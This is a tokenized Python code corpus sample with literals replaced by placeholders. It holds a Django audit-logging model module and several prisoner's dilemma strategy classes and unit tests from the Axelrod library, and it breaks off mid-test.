<s> from __future__ import unicode_literals <EOL> import copy <EOL> import datetime <EOL> from django . db import models <EOL> from django . utils . functional import curry <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . conf import settings <EOL> from audit_log . models . fields import LastUserField <EOL> from audit_log import settings as local_settings <EOL> try : <EOL> from django . utils . timezone import now as datetime_now <EOL> assert datetime_now <EOL> except ImportError : <EOL> import datetime <EOL> datetime_now = datetime . datetime . now <EOL> class LogEntryObjectDescriptor ( object ) : <EOL> def __init__ ( self , model ) : <EOL> self . model = model <EOL> def __get__ ( self , instance , owner ) : <EOL> kwargs = dict ( ( f . attname , getattr ( instance , f . attname ) ) <EOL> for f in self . model . _meta . fields <EOL> if hasattr ( instance , f . attname ) ) <EOL> return self . model ( ** kwargs ) <EOL> class AuditLogManager ( models . Manager ) : <EOL> def __init__ ( self , model , attname , instance = None , ) : <EOL> super ( AuditLogManager , self ) . __init__ ( ) <EOL> self . model = model <EOL> self . instance = instance <EOL> self . attname = attname <EOL> if instance is not None and not hasattr ( instance , '<STR_LIT>' % attname ) : <EOL> setattr ( instance , '<STR_LIT>' % attname , True ) <EOL> def enable_tracking ( self ) : <EOL> if self . instance is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> setattr ( self . instance , '<STR_LIT>' % self . attname , True ) <EOL> def disable_tracking ( self ) : <EOL> if self . instance is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> setattr ( self . instance , '<STR_LIT>' % self . attname , False ) <EOL> def is_tracking_enabled ( self ) : <EOL> if local_settings . DISABLE_AUDIT_LOG : <EOL> return False <EOL> if self . instance is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return getattr ( self . instance , '<STR_LIT>' % self . attname ) <EOL> def get_queryset ( self ) : <EOL> if self . instance is None : <EOL> return super ( AuditLogManager , self ) . get_queryset ( ) <EOL> f = { self . instance . _meta . pk . name : self . instance . pk } <EOL> return super ( AuditLogManager , self ) . get_queryset ( ) . filter ( ** f ) <EOL> class AuditLogDescriptor ( object ) : <EOL> def __init__ ( self , model , manager_class , attname ) : <EOL> self . model = model <EOL> self . manager_class = manager_class <EOL> self . attname = attname <EOL> def __get__ ( self , instance , owner ) : <EOL> if instance is None : <EOL> return self . manager_class ( self . model , self . attname ) <EOL> return self . manager_class ( self . model , self . attname , instance ) <EOL> class AuditLog ( object ) : <EOL> manager_class = AuditLogManager <EOL> def __init__ ( self , exclude = [ ] ) : <EOL> self . _exclude = exclude <EOL> def contribute_to_class ( self , cls , name ) : <EOL> self . manager_name = name <EOL> models . signals . class_prepared . connect ( self . finalize , sender = cls ) <EOL> def create_log_entry ( self , instance , action_type ) : <EOL> manager = getattr ( instance , self . manager_name ) <EOL> attrs = { } <EOL> for field in instance . _meta . fields : <EOL> if field . attname not in self . _exclude : <EOL> attrs [ field . attname ] = getattr ( instance , field . attname ) <EOL> manager . create ( action_type = action_type , ** attrs ) <EOL> def post_save ( self , instance , created , ** kwargs ) : <EOL> if getattr ( instance , self . manager_name ) . is_tracking_enabled ( ) : <EOL> self . create_log_entry ( instance , created and '<STR_LIT:I>' or '<STR_LIT>' ) <EOL> def post_delete ( self , instance , ** kwargs ) : <EOL> if getattr ( instance , self . manager_name ) . is_tracking_enabled ( ) : <EOL> self . create_log_entry ( instance , '<STR_LIT:D>' ) <EOL> def finalize ( self , sender , ** kwargs ) : <EOL> log_entry_model = self . create_log_entry_model ( sender ) <EOL> models . signals . post_save . connect ( self . post_save , sender = sender , weak = False ) <EOL> models . signals . post_delete . connect ( self . post_delete , sender = sender , weak = False ) <EOL> descriptor = AuditLogDescriptor ( log_entry_model , self . manager_class , self . manager_name ) <EOL> setattr ( sender , self . manager_name , descriptor ) <EOL> def copy_fields ( self , model ) : <EOL> """<STR_LIT>""" <EOL> fields = { '<STR_LIT>' : model . __module__ } <EOL> for field in model . _meta . fields : <EOL> if not field . name in self . _exclude : <EOL> field = copy . deepcopy ( field ) <EOL> if isinstance ( field , models . AutoField ) : <EOL> field . __class__ = models . IntegerField <EOL> if field . primary_key : <EOL> field . serialize = True <EOL> if isinstance ( field , models . OneToOneField ) : <EOL> field . __class__ = models . ForeignKey <EOL> if field . primary_key or field . unique : <EOL> field . primary_key = False <EOL> field . _unique = False <EOL> field . db_index = True <EOL> if field . rel and field . rel . related_name : <EOL> field . rel . related_name = '<STR_LIT>' % field . rel . related_name <EOL> elif field . rel : <EOL> try : <EOL> if field . rel . get_accessor_name ( ) : <EOL> field . rel . related_name = '<STR_LIT>' % field . rel . get_accessor_name ( ) <EOL> except : <EOL> pass <EOL> fields [ field . name ] = field <EOL> return fields <EOL> def get_logging_fields ( self , model ) : <EOL> """<STR_LIT>""" <EOL> rel_name = '<STR_LIT>' % model . _meta . object_name . lower ( ) <EOL> def entry_instance_to_unicode ( log_entry ) : <EOL> try : <EOL> result = '<STR_LIT>' % ( model . _meta . object_name , <EOL> log_entry . object_state , <EOL> log_entry . get_action_type_display ( ) . lower ( ) , <EOL> log_entry . action_date , <EOL> ) <EOL> except AttributeError : <EOL> result = '<STR_LIT>' % ( model . _meta . object_name , <EOL> log_entry . get_action_type_display ( ) . lower ( ) , <EOL> log_entry . action_date <EOL> ) <EOL> return result <EOL> action_user_field = LastUserField ( related_name = rel_name , editable = False ) <EOL> if [ model . _meta . app_label , model . __name__ ] == getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) . split ( "<STR_LIT:.>" ) : <EOL> action_user_field = LastUserField ( related_name = rel_name , editable = False , to = '<STR_LIT>' ) <EOL> return { <EOL> '<STR_LIT>' : models . AutoField ( primary_key = True ) , <EOL> '<STR_LIT>' : models . DateTimeField ( default = datetime_now , editable = False , blank = False ) , <EOL> '<STR_LIT>' : action_user_field , <EOL> '<STR_LIT>' : models . CharField ( max_length = <NUM_LIT:1> , editable = False , choices = ( <EOL> ( '<STR_LIT:I>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:D>' , _ ( '<STR_LIT>' ) ) , <EOL> ) ) , <EOL> '<STR_LIT>' : LogEntryObjectDescriptor ( model ) , <EOL> '<STR_LIT>' : entry_instance_to_unicode , <EOL> } <EOL> def get_meta_options ( self , model ) : <EOL> """<STR_LIT>""" <EOL> result = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT>' : model . _meta . app_label , <EOL> } <EOL> from django . db . models . options import DEFAULT_NAMES <EOL> if '<STR_LIT>' in DEFAULT_NAMES : <EOL> result . update ( { '<STR_LIT>' : ( ) } ) <EOL> return result <EOL> def create_log_entry_model ( self , model ) : <EOL> """<STR_LIT>""" <EOL> attrs = self . copy_fields ( model ) <EOL> attrs . update ( self . get_logging_fields ( model ) ) <EOL> attrs . update ( Meta = type ( str ( '<STR_LIT:Meta>' ) , ( ) , self . get_meta_options ( model ) ) ) <EOL> name = str ( '<STR_LIT>' % model . _meta . object_name ) <EOL> return type ( name , ( models . Model , ) , attrs ) </s>
<s> from __future__ import absolute_import <EOL> from . celery import app as celery_app </s>
<s> """<STR_LIT>""" <EOL> from math import sqrt <EOL> import random <EOL> from axelrod import Actions , Game , Player , init_args , flip_action , random_choice <EOL> from . memoryone import MemoryOnePlayer <EOL> C , D = Actions . C , Actions . D <EOL> class Davis ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ init_args <EOL> def __init__ ( self , rounds_to_cooperate = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> Player . __init__ ( self ) <EOL> self . _rounds_to_cooperate = rounds_to_cooperate <EOL> def strategy ( self , opponent ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . history ) < self . _rounds_to_cooperate : <EOL> return C <EOL> if opponent . defections : <EOL> return D <EOL> return C <EOL> class RevisedDowning ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ init_args <EOL> def __init__ ( self , revised = True ) : <EOL> Player . __init__ ( self ) <EOL> self . revised = revised <EOL> self . good = <NUM_LIT:1.0> <EOL> self . bad = <NUM_LIT:0.0> <EOL> self . nice1 = <NUM_LIT:0> <EOL> self . nice2 = <NUM_LIT:0> <EOL> self . total_C = <NUM_LIT:0> <EOL> self . total_D = <NUM_LIT:0> <EOL> def strategy ( self , opponent ) : <EOL> round_number = len ( self . history ) + <NUM_LIT:1> <EOL> if self . revised : <EOL> if round_number == <NUM_LIT:1> : <EOL> self . move = C <EOL> return self . move <EOL> elif not self . revised : <EOL> if round_number <= <NUM_LIT:2> : <EOL> self . move = D <EOL> return self . move <EOL> if round_number > <NUM_LIT:2> : <EOL> if self . history [ - <NUM_LIT:1> ] == D : <EOL> if opponent . history [ - <NUM_LIT:1> ] == C : <EOL> self . nice2 += <NUM_LIT:1> <EOL> self . total_D += <NUM_LIT:1> <EOL> self . bad = float ( self . nice2 ) / self . total_D <EOL> else : <EOL> if opponent . history [ - <NUM_LIT:1> ] == C : <EOL> self . nice1 += <NUM_LIT:1> <EOL> self . total_C += <NUM_LIT:1> <EOL> self . good = float ( self . nice1 ) / self . total_C <EOL> c = <NUM_LIT> * self . good - <NUM_LIT> * self . bad - <NUM_LIT:2> <EOL> alt = <NUM_LIT> * self . good - <NUM_LIT> * self . bad - <NUM_LIT:1> <EOL> if ( c >= <NUM_LIT:0> and c >= alt ) : <EOL> self . move = C <EOL> elif ( c >= <NUM_LIT:0> and c < alt ) or ( alt >= <NUM_LIT:0> ) : <EOL> self . move = flip_action ( self . move ) <EOL> else : <EOL> self . move = D <EOL> return self . move <EOL> def reset ( self ) : <EOL> Player . reset ( self ) <EOL> self . good = <NUM_LIT:1.0> <EOL> self . bad = <NUM_LIT:0.0> <EOL> self . nice1 = <NUM_LIT:0> <EOL> self . nice2 = <NUM_LIT:0> <EOL> self . total_C = <NUM_LIT:0> <EOL> self . total_D = <NUM_LIT:0> <EOL> class Feld ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:200> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ init_args <EOL> def __init__ ( self , start_coop_prob = <NUM_LIT:1.0> , end_coop_prob = <NUM_LIT:0.5> , <EOL> rounds_of_decay = <NUM_LIT:200> ) : <EOL> """<STR_LIT>""" <EOL> Player . __init__ ( self ) <EOL> self . _start_coop_prob = start_coop_prob <EOL> self . _end_coop_prob = end_coop_prob <EOL> self . _rounds_of_decay = rounds_of_decay <EOL> def _cooperation_probability ( self ) : <EOL> """<STR_LIT>""" <EOL> diff = ( self . _end_coop_prob - self . _start_coop_prob ) <EOL> slope = diff / float ( self . _rounds_of_decay ) <EOL> rounds = len ( self . history ) <EOL> return max ( self . _start_coop_prob + slope * rounds , <EOL> self . _end_coop_prob ) <EOL> def strategy ( self , opponent ) : <EOL> if not opponent . history : <EOL> return C <EOL> if opponent . history [ - <NUM_LIT:1> ] == D : <EOL> return D <EOL> p = self . _cooperation_probability ( ) <EOL> return random_choice ( p ) <EOL> class Grofman ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def strategy ( self , opponent ) : <EOL> round_number = len ( self . history ) + <NUM_LIT:1> <EOL> if round_number < <NUM_LIT:3> : <EOL> return C <EOL> if round_number < <NUM_LIT:8> : <EOL> return opponent . history [ - <NUM_LIT:1> ] <EOL> if self . history [ - <NUM_LIT:1> ] == opponent . history [ - <NUM_LIT:1> ] : <EOL> return C <EOL> return random_choice ( <NUM_LIT> / <NUM_LIT:7> ) <EOL> class Joss ( MemoryOnePlayer ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> @ init_args <EOL> def __init__ ( self , p = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> four_vector = ( p , <NUM_LIT:0> , p , <NUM_LIT:0> ) <EOL> self . p = p <EOL> super ( Joss , self ) . __init__ ( four_vector ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , round ( self . p , <NUM_LIT:2> ) ) <EOL> class Nydegger ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def __init__ ( self ) : <EOL> self . As = [ <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] <EOL> self . score_map = { ( C , C ) : <NUM_LIT:0> , <EOL> ( C , D ) : <NUM_LIT:2> , <EOL> ( D , C ) : <NUM_LIT:1> , <EOL> ( D , D ) : <NUM_LIT:3> } <EOL> super ( Nydegger , self ) . __init__ ( ) <EOL> @ staticmethod <EOL> def score_history ( my_history , opponent_history , score_map ) : <EOL> """<STR_LIT>""" <EOL> a = <NUM_LIT:0> <EOL> for i , weight in [ ( - <NUM_LIT:1> , <NUM_LIT:16> ) , ( - <NUM_LIT:2> , <NUM_LIT:4> ) , ( - <NUM_LIT:3> , <NUM_LIT:1> ) ] : <EOL> plays = ( my_history [ i ] , opponent_history [ i ] ) <EOL> a += weight * score_map [ plays ] <EOL> return a <EOL> def strategy ( self , opponent ) : <EOL> if len ( self . history ) == <NUM_LIT:0> : <EOL> return C <EOL> if len ( self . history ) == <NUM_LIT:1> : <EOL> return D if opponent . history [ - <NUM_LIT:1> ] == D else C <EOL> if len ( self . history ) == <NUM_LIT:2> : <EOL> if opponent . history [ <NUM_LIT:0> : <NUM_LIT:2> ] == [ D , C ] : <EOL> return D <EOL> else : <EOL> return D if opponent . history [ - <NUM_LIT:1> ] == D else C <EOL> A = self . score_history ( self . history [ - <NUM_LIT:3> : ] , opponent . history [ - <NUM_LIT:3> : ] , <EOL> self . score_map ) <EOL> if A in self . As : <EOL> return D <EOL> return C <EOL> class Shubik ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def __init__ ( self ) : <EOL> Player . __init__ ( self ) <EOL> self . is_retaliating = False <EOL> self . retaliation_length = <NUM_LIT:0> <EOL> self . retaliation_remaining = <NUM_LIT:0> <EOL> def _decrease_retaliation_counter ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_retaliating : <EOL> self . retaliation_remaining -= <NUM_LIT:1> <EOL> if self . retaliation_remaining == <NUM_LIT:0> : <EOL> self . is_retaliating = False <EOL> def strategy ( self , opponent ) : <EOL> if not opponent . history : <EOL> return C <EOL> if opponent . history [ - <NUM_LIT:1> ] == D : <EOL> if self . history [ - <NUM_LIT:1> ] == C : <EOL> self . is_retaliating = True <EOL> self . retaliation_length += <NUM_LIT:1> <EOL> self . retaliation_remaining = self . retaliation_length <EOL> self . _decrease_retaliation_counter ( ) <EOL> return D <EOL> else : <EOL> if self . is_retaliating : <EOL> self . _decrease_retaliation_counter ( ) <EOL> return D <EOL> if self . is_retaliating : <EOL> self . _decrease_retaliation_counter ( ) <EOL> return D <EOL> return C <EOL> def reset ( self ) : <EOL> Player . reset ( self ) <EOL> self . is_retaliating = False <EOL> self . retaliation_length = <NUM_LIT:0> <EOL> self . retaliation_remaining = <NUM_LIT:0> <EOL> class Tullock ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:11> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ init_args <EOL> def __init__ ( self , rounds_to_cooperate = <NUM_LIT:11> ) : <EOL> """<STR_LIT>""" <EOL> Player . __init__ ( self ) <EOL> self . _rounds_to_cooperate = rounds_to_cooperate <EOL> self . __class__ . memory_depth = rounds_to_cooperate <EOL> def strategy ( self , opponent ) : <EOL> rounds = self . _rounds_to_cooperate <EOL> if len ( self . history ) < rounds : <EOL> return C <EOL> cooperate_count = opponent . history [ - rounds : ] . count ( C ) <EOL> prop_cooperate = cooperate_count / float ( rounds ) <EOL> prob_cooperate = max ( <NUM_LIT:0> , prop_cooperate - <NUM_LIT> ) <EOL> return random_choice ( prob_cooperate ) <EOL> class UnnamedStrategy ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ staticmethod <EOL> def strategy ( opponent ) : <EOL> r = random . uniform ( <NUM_LIT:3> , <NUM_LIT:7> ) / float ( <NUM_LIT:10> ) <EOL> return random_choice ( r ) </s>
<s> from axelrod import Actions , Player , init_args <EOL> from axelrod . _strategy_utils import thue_morse_generator <EOL> class SequencePlayer ( Player ) : <EOL> """<STR_LIT>""" <EOL> @ init_args <EOL> def __init__ ( self , generator_function , generator_args = ( ) ) : <EOL> Player . __init__ ( self ) <EOL> self . generator_function = generator_function <EOL> self . generator_args = generator_args <EOL> self . sequence_generator = self . generator_function ( * self . generator_args ) <EOL> def meta_strategy ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value == <NUM_LIT:0> : <EOL> return Actions . D <EOL> else : <EOL> return Actions . C <EOL> def strategy ( self , opponent ) : <EOL> for s in self . sequence_generator : <EOL> return self . meta_strategy ( s ) <EOL> def reset ( self ) : <EOL> Player . reset ( self ) <EOL> self . sequence_generator = self . generator_function ( * self . generator_args ) <EOL> class ThueMorse ( SequencePlayer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ init_args <EOL> def __init__ ( self ) : <EOL> SequencePlayer . __init__ ( self , thue_morse_generator , ( <NUM_LIT:0> , ) ) <EOL> class ThueMorseInverse ( ThueMorse ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ init_args <EOL> def __init__ ( self ) : <EOL> SequencePlayer . __init__ ( self , thue_morse_generator , ( <NUM_LIT:0> , ) ) <EOL> def meta_strategy ( self , value ) : <EOL> if value == <NUM_LIT:0> : <EOL> return Actions . C <EOL> else : <EOL> return Actions . D </s>
<s> """<STR_LIT>""" <EOL> import axelrod <EOL> from . test_player import TestPlayer , test_responses , TestOpponent <EOL> C , D = axelrod . Actions . C , axelrod . Actions . D <EOL> class TestGrumpy ( TestPlayer ) : <EOL> name = "<STR_LIT>" <EOL> player = axelrod . Grumpy <EOL> expected_classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_initial_nice_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_initial_grumpy_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> P1 = axelrod . Grumpy ( starting_state = '<STR_LIT>' ) <EOL> P2 = TestOpponent ( ) <EOL> self . assertEqual ( P1 . strategy ( P2 ) , D ) <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> P1 = axelrod . Grumpy ( grumpy_threshold = <NUM_LIT:3> , nice_threshold = <NUM_LIT:0> ) <EOL> P2 = TestOpponent ( ) <EOL> test_responses ( self , P1 , P2 , [ C , D , D , D ] , [ C , C , C , C ] , [ C ] ) <EOL> P1 = axelrod . Grumpy ( grumpy_threshold = <NUM_LIT:3> , nice_threshold = <NUM_LIT:0> ) <EOL> P2 = TestOpponent ( ) <EOL> test_responses ( self , P1 , P2 , [ C , C , D , D , D ] , [ D , D , D , D , D ] , [ D ] ) <EOL> P1 = axelrod . Grumpy ( grumpy_threshold = <NUM_LIT:3> , nice_threshold = <NUM_LIT:0> ) <EOL> P2 = TestOpponent ( ) <EOL> test_responses ( self , P1 , P2 , [ C , C , D , D , D , D , D , D ] , <EOL> [ D , D , D , D , D , C , C , C ] , [ D ] ) <EOL> P1 = axelrod . Grumpy ( grumpy_threshold = <NUM_LIT:3> , nice_threshold = <NUM_LIT:0> ) <EOL> P2 = TestOpponent ( ) <EOL> test_responses ( self , P1 , P2 , [ C , C , D , D , D , D , D , D , D , D , D ] , <EOL> [ D , D , D , D , D , C , C , C , C , C , C ] , [ C ] ) <EOL> def test_reset_method ( self ) : <EOL> """<STR_LIT>""" <EOL> P1 = axelrod . Grumpy ( starting_state = '<STR_LIT>' ) <EOL> P1 . history = [ C , D , D , D ] <EOL> P1 . state = '<STR_LIT>' <EOL> P1 . reset ( ) <EOL> self . assertEqual ( P1 . history , [ ] ) <EOL> self . assertEqual ( P1 . state , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import axelrod <EOL> from . test_player import TestHeadsUp , TestPlayer <EOL> C , D = axelrod . Actions . C , axelrod . Actions . D <EOL> class TestTitForTat ( TestPlayer ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> player = axelrod . TitForTat <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_effect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . markov_test ( [ C , D , C , D ] ) <EOL> self . responses_test ( [ C ] * <NUM_LIT:4> , [ C , C , C , C ] , [ C ] ) <EOL> self . responses_test ( [ C ] * <NUM_LIT:5> , [ C , C , C , C , D ] , [ D ] ) <EOL> class TestTitFor2Tats ( TestPlayer ) : <EOL> name = '<STR_LIT>' <EOL> player = axelrod . TitFor2Tats <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_effect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . responses_test ( [ C , C , C ] , [ D , D , D ] , [ D ] ) <EOL> self . responses_test ( [ C , C , D , D ] , [ D , D , D , C ] , [ C ] ) <EOL> class TestTwoTitsForTat ( TestPlayer ) : <EOL> name = '<STR_LIT>' <EOL> player = axelrod . TwoTitsForTat <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_effect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . responses_test ( [ C ] , [ D ] , [ D ] ) <EOL> self . responses_test ( [ C , C ] , [ D , D ] , [ D ] ) <EOL> self . responses_test ( [ C , C , C ] , [ D , D , C ] , [ D ] ) <EOL> self . responses_test ( [ C , C , D , D ] , [ D , D , C , C ] , [ C ] ) <EOL> class TestBully ( TestPlayer ) : <EOL> name = "<STR_LIT>" <EOL> player = axelrod . Bully <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( D ) <EOL> def test_affect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . markov_test ( [ D , C , D , C ] ) <EOL> class TestSneakyTitForTat ( TestPlayer ) : <EOL> name = "<STR_LIT>" <EOL> player = axelrod . SneakyTitForTat <EOL> expected_classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_effect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . responses_test ( [ C , C ] , [ C , C ] , [ D ] ) <EOL> self . responses_test ( [ C , C , D , D ] , [ C , C , C , D ] , [ C ] ) <EOL> class TestSuspiciousTitForTat ( TestPlayer ) : <EOL> name = '<STR_LIT>' <EOL> player = axelrod . SuspiciousTitForTat <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( D ) <EOL> def test_affect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . markov_test ( [ C , D , C , D ] ) <EOL> class TestAntiTitForTat ( TestPlayer ) : <EOL> name = '<STR_LIT>' <EOL> player = axelrod . AntiTitForTat <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_affect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . markov_test ( [ D , C , D , C ] ) <EOL> class TestHardTitForTat ( TestPlayer ) : <EOL> name = "<STR_LIT>" <EOL> player = axelrod . HardTitForTat <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_effect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . responses_test ( [ C , C , C ] , [ C , C , C ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C ] , [ D , C , C ] , [ D ] ) <EOL> self . responses_test ( [ C , C , C ] , [ C , D , C ] , [ D ] ) <EOL> self . responses_test ( [ C , C , C ] , [ C , C , D ] , [ D ] ) <EOL> self . responses_test ( [ C , C , C , C ] , [ D , C , C , C ] , [ C ] ) <EOL> class TestHardTitFor2Tats ( TestPlayer ) : <EOL> name = "<STR_LIT>" <EOL> player = axelrod . HardTitFor2Tats <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> 